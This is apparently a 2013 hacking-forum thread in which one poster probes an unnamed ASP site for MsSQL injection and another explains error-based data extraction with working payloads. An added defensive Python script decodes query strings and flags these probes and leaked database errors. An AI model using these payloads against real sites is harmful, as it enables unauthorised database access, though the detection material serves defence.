How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
[MsSQL Injection] Only select works and how to create an error.
Posted by: netpumber
Date: January 05, 2013 10:01AM

Hi.

I found this vuln and I'm trying to exploit it for two days now. It's a little curious how it seems that it works.

With a single quote:

.asp?id=8'

RETURNED :

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ''.

But if you try to use group by or something like or 1=1 / and 1=1:

.asp?id=8 having 1=1--
.asp?id=8 or 1=1--

RETURNED:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'having'.

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'or'.

After that I tried to see which SQL command would not return an error.
I've just put select *

.asp?id=8 select *--

and RETURNED:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Must specify table to select from.

Hmm, a different error from the others. So I decided to try retrieving some table names from information_schema and I executed

.asp?id=8 select table_name from information_schema.tables--

but it RETURNED no ERROR and the page loaded correctly.

I thought that my query was executed without an error and that's why it happened.
Let's create an error:

.asp?id=8+convert(int,(select table_name from information_schema.tables))--

RETURNED:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'convert'.

So this is my story.
Does anyone have an idea on how to make it print out the error?
Any hint is welcomed!

Re: [MsSQL Injection] Only select works and how to create an error.
Posted by: hack2012
Date: January 05, 2013 07:46PM

Where is the url?

Re: [MsSQL Injection] Only select works and how to create an error.
Posted by: Reiners
Date: March 07, 2013 03:21PM

netpumber Wrote:
-------------------------------------------------------
> I thought that my query was executed without an
> error and that's why it happened.
> Let's create an error
>
> .asp?id=8+convert(int,(select table_name from
> information_schema.tables))--
>
> RETURNED:
>
> Microsoft OLE DB Provider for SQL Server error
> '80040e14'
> Incorrect syntax near the keyword 'convert'.
>
> So this is my story.
> Does anyone have an idea on how to make it print
> out the error ?
> Any hint is welcomed!

Extracting data through the error message as a side channel is the right way to go. The plus is urlencoded, so use %2b or a minus to get this to work.

.asp?id=8-convert(int,version())--

If you are using subselects, make sure they return only one row:

.asp?id=8-convert(int,(select top 1 table_name from information_schema.tables))--

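Looking at the two points in this thread from the defender's side (the `+` that the server decoded to a space before the query ever ran, and the raw OLE DB error text the page echoes back, which is exactly the side channel Reiners describes), here is an added Python example that is not from the thread or from any poster. It shows how a form-decoded query string treats `+` versus `%2b`, and runs a small probe/error-leak check over constructed request lines modelled on the ones above. The path `/page.asp`, the log line format, the pattern list and the function names are assumptions for illustration.

```python
# Added example (not from the sla.ckers.org thread): how a classic ASP-style
# query-string decoder sees '+' versus '%2b', plus a reviewer's check that flags
# the probes and the raw SQL Server errors seen in this thread. All sample
# requests and error strings below are constructed from the thread.
import re
from urllib.parse import urlsplit, parse_qs

# (1) Form-style decoding (application/x-www-form-urlencoded) turns '+' into a
# space; only a percent-encoded %2b survives as a literal '+'. This is why
# "8+convert(...)" reached SQL Server as "8 convert(...)" and tripped a syntax error.
def decode_query_param(url, name):
    """Return the parameter value the way Request.QueryString-style decoding sees it."""
    qs = urlsplit(url).query
    return parse_qs(qs, keep_blank_values=True).get(name, [""])[0]

# (2) Patterns a log reviewer or WAF rule would look for, drawn from the payloads
# in the thread. They are matched against the *decoded* parameter value.
PROBE_PATTERNS = [
    re.compile(r"'\s*$"),                                # trailing quote probe
    re.compile(r"\b(having|or|and)\s+1\s*=\s*1", re.I),  # boolean / grouping probes
    re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),       # error-based casting
    re.compile(r"information_schema\.tables", re.I),     # schema enumeration
    re.compile(r"--\s*$"),                               # comment terminator
]

# Raw error text that should never reach a client: it is the information leak.
ERROR_SIGNATURES = [
    "Microsoft OLE DB Provider for SQL Server error '80040e14'",
    "Unclosed quotation mark after the character string",
    "Incorrect syntax near the keyword",
    "Must specify table to select from",
]

def classify_request(url, param="id"):
    """Return a list of reasons a request looks like SQL injection probing."""
    value = decode_query_param(url, param)
    # A non-numeric value where an integer id is expected is the cheapest signal.
    hits = [] if value.strip().isdigit() else ["non-numeric id"]
    hits += [p.pattern for p in PROBE_PATTERNS if p.search(value)]
    return hits

def leaks_db_error(body):
    """True if a response body echoes a raw SQL Server / OLE DB error."""
    return any(sig in body for sig in ERROR_SIGNATURES)

# Constructed access-log excerpt (method, path, status), modelled on the thread.
SAMPLE_LOG = [
    "GET /page.asp?id=8 200",
    "GET /page.asp?id=8' 500",
    "GET /page.asp?id=8%20or%201=1-- 500",
    "GET /page.asp?id=8%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables))-- 500",
]

def review_log(lines):
    """Return (path, reasons) for every log line whose request looks like a probe."""
    flagged = []
    for line in lines:
        _method, path, _status = line.split()
        hits = classify_request(path)
        if hits:
            flagged.append((path, hits))
    return flagged

if __name__ == "__main__":
    plus = "/page.asp?id=8+convert(int,(select table_name from information_schema.tables))--"
    enc = "/page.asp?id=8%2bconvert(int,(select table_name from information_schema.tables))--"
    print("decoded '+'  :", decode_query_param(plus, "id"))
    print("decoded '%2b':", decode_query_param(enc, "id"))
    for path, reasons in review_log(SAMPLE_LOG):
        print(path, "->", reasons)
```

The fix on the application side is the usual pair: bind `id` as an integer parameter instead of concatenating it into the statement, and return a generic error page so the OLE DB message text is logged server-side rather than shown, since the message itself is what carries the extracted data.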